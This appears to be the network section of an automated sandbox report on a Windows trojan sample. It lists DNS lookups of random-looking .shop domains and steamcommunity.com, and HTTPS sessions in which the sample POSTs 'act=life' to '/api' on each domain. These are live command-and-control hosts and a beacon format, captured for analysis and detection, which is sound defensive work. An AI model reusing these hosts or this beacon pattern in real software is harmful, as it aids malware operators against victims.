                                                                        Sep 26, 2024 21:26:25.241941929 CEST44349744172.67.208.139192.168.2.4
                                                                        Sep 26, 2024 21:26:25.242032051 CEST49744443192.168.2.4172.67.208.139
                                                                        Sep 26, 2024 21:26:25.243489981 CEST49744443192.168.2.4172.67.208.139
                                                                        Sep 26, 2024 21:26:25.243541956 CEST44349744172.67.208.139192.168.2.4
                                                                        Sep 26, 2024 21:26:25.243952036 CEST44349744172.67.208.139192.168.2.4
                                                                        Sep 26, 2024 21:26:25.245131969 CEST49744443192.168.2.4172.67.208.139
                                                                        Sep 26, 2024 21:26:25.245176077 CEST49744443192.168.2.4172.67.208.139
                                                                        Sep 26, 2024 21:26:25.245239973 CEST44349744172.67.208.139192.168.2.4
                                                                        Sep 26, 2024 21:26:25.664123058 CEST44349744172.67.208.139192.168.2.4
                                                                        Sep 26, 2024 21:26:25.664361954 CEST44349744172.67.208.139192.168.2.4
                                                                        Sep 26, 2024 21:26:25.664433956 CEST49744443192.168.2.4172.67.208.139
                                                                        Sep 26, 2024 21:26:25.666843891 CEST49744443192.168.2.4172.67.208.139
                                                                        Sep 26, 2024 21:26:25.666914940 CEST44349744172.67.208.139192.168.2.4
                                                                        Sep 26, 2024 21:26:25.666965961 CEST49744443192.168.2.4172.67.208.139
                                                                        Sep 26, 2024 21:26:25.667002916 CEST44349744172.67.208.139192.168.2.4
                                                                        Sep 26, 2024 21:26:25.757353067 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:25.757392883 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:25.757456064 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:25.757725000 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:25.757740021 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:26.397069931 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:26.397182941 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:26.401381016 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:26.401412010 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:26.401768923 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:26.402882099 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:26.447402000 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:26.950088978 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:26.950120926 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:26.950145960 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:26.950182915 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:26.950197935 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:26.950246096 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:27.051290989 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:27.051318884 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:27.051352978 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:27.051408052 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:27.051430941 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:27.051459074 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:27.057090998 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:27.057166100 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:27.057185888 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:27.057223082 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:27.057260990 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:27.057281017 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:27.057307959 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:27.057320118 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:27.057320118 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:27.057327986 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:27.057333946 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:27.072716951 CEST49746443192.168.2.4172.67.128.144
                                                                        Sep 26, 2024 21:26:27.072829962 CEST44349746172.67.128.144192.168.2.4
                                                                        Sep 26, 2024 21:26:27.075135946 CEST49746443192.168.2.4172.67.128.144
                                                                        Sep 26, 2024 21:26:27.075900078 CEST49746443192.168.2.4172.67.128.144
                                                                        Sep 26, 2024 21:26:27.075936079 CEST44349746172.67.128.144192.168.2.4
                                                                        Sep 26, 2024 21:26:27.581589937 CEST44349746172.67.128.144192.168.2.4
                                                                        Sep 26, 2024 21:26:27.581682920 CEST49746443192.168.2.4172.67.128.144
                                                                        Sep 26, 2024 21:26:27.583129883 CEST49746443192.168.2.4172.67.128.144
                                                                        Sep 26, 2024 21:26:27.583168983 CEST44349746172.67.128.144192.168.2.4
                                                                        Sep 26, 2024 21:26:27.583530903 CEST44349746172.67.128.144192.168.2.4
                                                                        Sep 26, 2024 21:26:27.584635973 CEST49746443192.168.2.4172.67.128.144
                                                                        Sep 26, 2024 21:26:27.584681034 CEST49746443192.168.2.4172.67.128.144
                                                                        Sep 26, 2024 21:26:27.584733963 CEST44349746172.67.128.144192.168.2.4
                                                                        Sep 26, 2024 21:26:28.033375025 CEST44349746172.67.128.144192.168.2.4
                                                                        Sep 26, 2024 21:26:28.033488035 CEST44349746172.67.128.144192.168.2.4
                                                                        Sep 26, 2024 21:26:28.033555984 CEST49746443192.168.2.4172.67.128.144
                                                                        Sep 26, 2024 21:26:28.033736944 CEST49746443192.168.2.4172.67.128.144
                                                                        Sep 26, 2024 21:26:28.033782005 CEST44349746172.67.128.144192.168.2.4
                                                                        Sep 26, 2024 21:26:28.033808947 CEST49746443192.168.2.4172.67.128.144
                                                                        Sep 26, 2024 21:26:28.033824921 CEST44349746172.67.128.144192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 26, 2024 21:26:16.070451975 CEST | 54940 | 53 | 192.168.2.4 | 1.1.1.1
Sep 26, 2024 21:26:16.095346928 CEST | 53 | 54940 | 1.1.1.1 | 192.168.2.4
Sep 26, 2024 21:26:17.088211060 CEST | 53409 | 53 | 192.168.2.4 | 1.1.1.1
Sep 26, 2024 21:26:17.106355906 CEST | 53 | 53409 | 1.1.1.1 | 192.168.2.4
Sep 26, 2024 21:26:18.999444962 CEST | 61718 | 53 | 192.168.2.4 | 1.1.1.1
Sep 26, 2024 21:26:19.026995897 CEST | 53 | 61718 | 1.1.1.1 | 192.168.2.4
Sep 26, 2024 21:26:20.003263950 CEST | 54999 | 53 | 192.168.2.4 | 1.1.1.1
Sep 26, 2024 21:26:20.024143934 CEST | 53 | 54999 | 1.1.1.1 | 192.168.2.4
Sep 26, 2024 21:26:21.498032093 CEST | 60290 | 53 | 192.168.2.4 | 1.1.1.1
Sep 26, 2024 21:26:21.513864040 CEST | 53 | 60290 | 1.1.1.1 | 192.168.2.4
Sep 26, 2024 21:26:22.460223913 CEST | 53798 | 53 | 192.168.2.4 | 1.1.1.1
Sep 26, 2024 21:26:22.474739075 CEST | 53 | 53798 | 1.1.1.1 | 192.168.2.4
Sep 26, 2024 21:26:23.625767946 CEST | 52289 | 53 | 192.168.2.4 | 1.1.1.1
Sep 26, 2024 21:26:23.641207933 CEST | 53 | 52289 | 1.1.1.1 | 192.168.2.4
Sep 26, 2024 21:26:24.738372087 CEST | 52359 | 53 | 192.168.2.4 | 1.1.1.1
Sep 26, 2024 21:26:24.755327940 CEST | 53 | 52359 | 1.1.1.1 | 192.168.2.4
Sep 26, 2024 21:26:25.749514103 CEST | 50878 | 53 | 192.168.2.4 | 1.1.1.1
Sep 26, 2024 21:26:25.756768942 CEST | 53 | 50878 | 1.1.1.1 | 192.168.2.4
Sep 26, 2024 21:26:27.058583021 CEST | 49665 | 53 | 192.168.2.4 | 1.1.1.1
Sep 26, 2024 21:26:27.070909977 CEST | 53 | 49665 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 26, 2024 21:26:16.070451975 CEST | 192.168.2.4 | 1.1.1.1 | 0x96a6 | Standard query (0) | ghostreedmnu.shop | A (IP address) | IN (0x0001) | false
Sep 26, 2024 21:26:17.088211060 CEST | 192.168.2.4 | 1.1.1.1 | 0x6542 | Standard query (0) | gutterydhowi.shop | A (IP address) | IN (0x0001) | false
Sep 26, 2024 21:26:18.999444962 CEST | 192.168.2.4 | 1.1.1.1 | 0x1f2d | Standard query (0) | offensivedzvju.shop | A (IP address) | IN (0x0001) | false
Sep 26, 2024 21:26:20.003263950 CEST | 192.168.2.4 | 1.1.1.1 | 0x14c2 | Standard query (0) | vozmeatillu.shop | A (IP address) | IN (0x0001) | false
Sep 26, 2024 21:26:21.498032093 CEST | 192.168.2.4 | 1.1.1.1 | 0xa3c7 | Standard query (0) | drawzhotdog.shop | A (IP address) | IN (0x0001) | false
Sep 26, 2024 21:26:22.460223913 CEST | 192.168.2.4 | 1.1.1.1 | 0x85a8 | Standard query (0) | fragnantbui.shop | A (IP address) | IN (0x0001) | false
Sep 26, 2024 21:26:23.625767946 CEST | 192.168.2.4 | 1.1.1.1 | 0xc511 | Standard query (0) | stogeneratmns.shop | A (IP address) | IN (0x0001) | false
Sep 26, 2024 21:26:24.738372087 CEST | 192.168.2.4 | 1.1.1.1 | 0x5fa5 | Standard query (0) | reinforcenh.shop | A (IP address) | IN (0x0001) | false
Sep 26, 2024 21:26:25.749514103 CEST | 192.168.2.4 | 1.1.1.1 | 0x856a | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Sep 26, 2024 21:26:27.058583021 CEST | 192.168.2.4 | 1.1.1.1 | 0xcef9 | Standard query (0) | ballotnwu.site | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 26, 2024 21:26:16.095346928 CEST | 1.1.1.1 | 192.168.2.4 | 0x96a6 | No error (0) | ghostreedmnu.shop | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 21:26:16.095346928 CEST | 1.1.1.1 | 192.168.2.4 | 0x96a6 | No error (0) | ghostreedmnu.shop | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 21:26:17.106355906 CEST | 1.1.1.1 | 192.168.2.4 | 0x6542 | No error (0) | gutterydhowi.shop | | 104.21.4.136 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 21:26:17.106355906 CEST | 1.1.1.1 | 192.168.2.4 | 0x6542 | No error (0) | gutterydhowi.shop | | 172.67.132.32 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 21:26:19.026995897 CEST | 1.1.1.1 | 192.168.2.4 | 0x1f2d | No error (0) | offensivedzvju.shop | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 21:26:19.026995897 CEST | 1.1.1.1 | 192.168.2.4 | 0x1f2d | No error (0) | offensivedzvju.shop | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 21:26:20.024143934 CEST | 1.1.1.1 | 192.168.2.4 | 0x14c2 | No error (0) | vozmeatillu.shop | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 21:26:20.024143934 CEST | 1.1.1.1 | 192.168.2.4 | 0x14c2 | No error (0) | vozmeatillu.shop | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 21:26:21.513864040 CEST | 1.1.1.1 | 192.168.2.4 | 0xa3c7 | No error (0) | drawzhotdog.shop | | 172.67.162.108 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 21:26:21.513864040 CEST | 1.1.1.1 | 192.168.2.4 | 0xa3c7 | No error (0) | drawzhotdog.shop | | 104.21.58.182 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 21:26:22.474739075 CEST | 1.1.1.1 | 192.168.2.4 | 0x85a8 | No error (0) | fragnantbui.shop | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 21:26:22.474739075 CEST | 1.1.1.1 | 192.168.2.4 | 0x85a8 | No error (0) | fragnantbui.shop | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 21:26:23.641207933 CEST | 1.1.1.1 | 192.168.2.4 | 0xc511 | No error (0) | stogeneratmns.shop | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 21:26:23.641207933 CEST | 1.1.1.1 | 192.168.2.4 | 0xc511 | No error (0) | stogeneratmns.shop | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 21:26:24.755327940 CEST | 1.1.1.1 | 192.168.2.4 | 0x5fa5 | No error (0) | reinforcenh.shop | | 172.67.208.139 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 21:26:24.755327940 CEST | 1.1.1.1 | 192.168.2.4 | 0x5fa5 | No error (0) | reinforcenh.shop | | 104.21.77.130 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 21:26:25.756768942 CEST | 1.1.1.1 | 192.168.2.4 | 0x856a | No error (0) | steamcommunity.com | | 104.102.49.254 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 21:26:27.070909977 CEST | 1.1.1.1 | 192.168.2.4 | 0xcef9 | No error (0) | ballotnwu.site | | 172.67.128.144 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 21:26:27.070909977 CEST | 1.1.1.1 | 192.168.2.4 | 0xcef9 | No error (0) | ballotnwu.site | | 104.21.2.13 | A (IP address) | IN (0x0001) | false
• ghostreedmnu.shop
• gutterydhowi.shop
• offensivedzvju.shop
• vozmeatillu.shop
• drawzhotdog.shop
• fragnantbui.shop
• stogeneratmns.shop
• reinforcenh.shop
• steamcommunity.com
• ballotnwu.site
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49734 | 188.114.97.3 | 443 | 7016 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-26 19:26:16 UTC | 264 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: ghostreedmnu.shop
2024-09-26 19:26:16 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-09-26 19:26:17 UTC | 772 | IN | HTTP/1.1 200 OK
Date: Thu, 26 Sep 2024 19:26:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=kbrc0igl62dj3sj8vhcdji8ko5; expires=Mon, 20 Jan 2025 13:12:55 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hq5b7SiFKO5EtFpmSQJVSMZj4MMaceiGrTQJTkId%2B7ht0cK5r4uCgpmucqL8rvZZOVYuJK9hzsxagSU6ieCHkVkioTJf4RGEpTwwCHg7nZDjBNIZKungDx6QcVNIWrkFm%2FLjKg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c95a50a58cb0fa1-EWR
2024-09-26 19:26:17 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
Data Ascii: aerror #D12
2024-09-26 19:26:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 1
Source IP: 192.168.2.4
Source Port: 49736
Destination IP: 104.21.4.136
Destination Port: 443
PID: 7016
Process: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe

Timestamp                Bytes  Direction  Data
2024-09-26 19:26:17 UTC  264    OUT        POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8
  Host: gutterydhowi.shop
2024-09-26 19:26:17 UTC  8      OUT        Data Raw: 61 63 74 3d 6c 69 66 65
  Data Ascii: act=life
2024-09-26 19:26:18 UTC  774    IN         HTTP/1.1 200 OK
  Date: Thu, 26 Sep 2024 19:26:18 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: PHPSESSID=631tgcvgvmuptq7vqju305qhba; expires=Mon, 20 Jan 2025 13:12:56 GMT; Max-Age=9999999; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4l7WATWdSZnP9EyZMoPggVQr4X4rkcnqdCKMsIxzCgkUzwGQZ2kwl3%2FNV9DNII3U7SmpESdHYEqAiE2o4B2LrJcnontmr6EfyPUjPkwAQi17ZY%2BMG4Nz%2BBkv2qIddQvMPvI9qg%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8c95a510acf51871-EWR
2024-09-26 19:26:18 UTC  15     IN         Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
  Data Ascii: aerror #D12
2024-09-26 19:26:18 UTC  5      IN         Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0

Session ID: 2
Source IP: 192.168.2.4
Source Port: 49738
Destination IP: 188.114.97.3
Destination Port: 443
PID: 7016
Process: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe

Timestamp                Bytes  Direction  Data
2024-09-26 19:26:18 UTC  264    OUT        POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8
  Host: ghostreedmnu.shop
2024-09-26 19:26:18 UTC  8      OUT        Data Raw: 61 63 74 3d 6c 69 66 65
  Data Ascii: act=life
2024-09-26 19:26:18 UTC  774    IN         HTTP/1.1 200 OK
  Date: Thu, 26 Sep 2024 19:26:18 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: PHPSESSID=84o3vl4n5adfiaos2j66st9t8c; expires=Mon, 20 Jan 2025 13:12:57 GMT; Max-Age=9999999; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wGPMZA6Kh7W%2F%2BPZECbPBwOgq4kVtmaBQWk8Rl4MJZEVg6zbC41bj8ZbAbouzVf5%2FG9P7KvMeHFmYi1SnEicvG76yys9HbIgMUyO08euuzDi8OSh7CZOXzY7KA2LFBwCdkVPJhw%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8c95a5166e5c19d7-EWR
2024-09-26 19:26:18 UTC  15     IN         Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
  Data Ascii: aerror #D12
2024-09-26 19:26:18 UTC  5      IN         Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0

Session ID: 3
Source IP: 192.168.2.4
Source Port: 49739
Destination IP: 188.114.97.3
Destination Port: 443
PID: 7016
Process: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe

Timestamp                Bytes  Direction  Data
2024-09-26 19:26:19 UTC  266    OUT        POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8
  Host: offensivedzvju.shop
2024-09-26 19:26:19 UTC  8      OUT        Data Raw: 61 63 74 3d 6c 69 66 65
  Data Ascii: act=life
2024-09-26 19:26:19 UTC  768    IN         HTTP/1.1 200 OK
  Date: Thu, 26 Sep 2024 19:26:19 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: PHPSESSID=e2cem0bnqls4rerse4lv3tj6h4; expires=Mon, 20 Jan 2025 13:12:58 GMT; Max-Age=9999999; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4xp7m1fqVX9ph1d7ElRhz71Jf2NNoHmcbD61ShM4wzkoysdguRN9wwKmc1zTqHpx62YjI1LK%2Bn5fCOfZp5hWuh0bAVI88aVtvRm0f%2FhYg86i5UCJEBvNjMFcxcElNUDuFisnr8wU"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8c95a51c89bb8c81-EWR
2024-09-26 19:26:19 UTC  15     IN         Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
  Data Ascii: aerror #D12
2024-09-26 19:26:19 UTC  5      IN         Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0

Session ID: 4
Source IP: 192.168.2.4
Source Port: 49740
Destination IP: 188.114.96.3
Destination Port: 443
PID: 7016
Process: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe

Timestamp                Bytes  Direction  Data
2024-09-26 19:26:20 UTC  263    OUT        POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8
  Host: vozmeatillu.shop
2024-09-26 19:26:20 UTC  8      OUT        Data Raw: 61 63 74 3d 6c 69 66 65
  Data Ascii: act=life
2024-09-26 19:26:20 UTC  782    IN         HTTP/1.1 200 OK
  Date: Thu, 26 Sep 2024 19:26:20 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: PHPSESSID=15h75bih8nhm19fo99nq60fgen; expires=Mon, 20 Jan 2025 13:12:59 GMT; Max-Age=9999999; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k6ce%2FRlRqRoB7PGT%2BWMsFr8gvLCWXkO%2B1%2FBiyzYMTkCpkiNAclUtS0%2BG489l%2F4MAMHApu0btiI%2Bx0rkCSRooTysTi5NGZEf%2BX%2BI%2Fcz3VLl0NGz8wwUCpI55W2ENmUVoRV9%2BI"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8c95a5228e7e5e70-EWR
2024-09-26 19:26:20 UTC  15     IN         Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
  Data Ascii: aerror #D12
2024-09-26 19:26:20 UTC  5      IN         Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0

Session ID: 5
Source IP: 192.168.2.4
Source Port: 49741
Destination IP: 172.67.162.108
Destination Port: 443
PID: 7016
Process: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe

Timestamp                Bytes  Direction  Data
2024-09-26 19:26:21 UTC  263    OUT        POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8
  Host: drawzhotdog.shop
2024-09-26 19:26:21 UTC  8      OUT        Data Raw: 61 63 74 3d 6c 69 66 65
  Data Ascii: act=life
2024-09-26 19:26:22 UTC  772    IN         HTTP/1.1 200 OK
  Date: Thu, 26 Sep 2024 19:26:22 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: PHPSESSID=5jjinqp40fdtgar9gpfu3f8jhe; expires=Mon, 20 Jan 2025 13:13:01 GMT; Max-Age=9999999; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W7yENhlFpQHhJ02SANMZnNM%2BcK32t3xyZo%2BIbDKfBZQb9aIz92IdfLhd%2FbhDqi3xJK2XI%2BlKF4DezmAvZfhqikl2K5Ap4mNuFfbmEYZUSLQ3%2FhrC0spabibMWrr%2BpV7afX89"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8c95a52bdd074204-EWR
2024-09-26 19:26:22 UTC  15     IN         Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
  Data Ascii: aerror #D12
2024-09-26 19:26:22 UTC  5      IN         Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0

Session ID: 6
Source IP: 192.168.2.4
Source Port: 49742
Destination IP: 188.114.97.3
Destination Port: 443
PID: 7016
Process: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe

Timestamp                Bytes  Direction  Data
2024-09-26 19:26:22 UTC  263    OUT        POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8
  Host: fragnantbui.shop
2024-09-26 19:26:22 UTC  8      OUT        Data Raw: 61 63 74 3d 6c 69 66 65
  Data Ascii: act=life
2024-09-26 19:26:23 UTC  766    IN         HTTP/1.1 200 OK
  Date: Thu, 26 Sep 2024 19:26:23 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: PHPSESSID=gvppk838c8k3kdn9lpdq4ppp0a; expires=Mon, 20 Jan 2025 13:13:02 GMT; Max-Age=9999999; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=prSUZPOcebQjo9av4kBmfDk7%2FnHgFHYVFI4p0CYVDk1g86VOs3cYPUTZu5i6PMz1mpl2iUqXChk5lesjkf9LbQJvokDJli%2FieztChMcx0u5sIY4uhHZA6CNU%2BqmKJkhxe4wC"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8c95a5322af70ca5-EWR
2024-09-26 19:26:23 UTC  15     IN         Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
  Data Ascii: aerror #D12
2024-09-26 19:26:23 UTC  5      IN         Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0

Session ID: 7
Source IP: 192.168.2.4
Source Port: 49743
Destination IP: 188.114.96.3
Destination Port: 443
PID: 7016
Process: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe

Timestamp                Bytes  Direction  Data
2024-09-26 19:26:24 UTC  265    OUT        POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8
  Host: stogeneratmns.shop
2024-09-26 19:26:24 UTC  8      OUT        Data Raw: 61 63 74 3d 6c 69 66 65
  Data Ascii: act=life
2024-09-26 19:26:24 UTC  780    IN         HTTP/1.1 200 OK
  Date: Thu, 26 Sep 2024 19:26:24 GMT
  Content-Type: text/html; charset=UTF-8
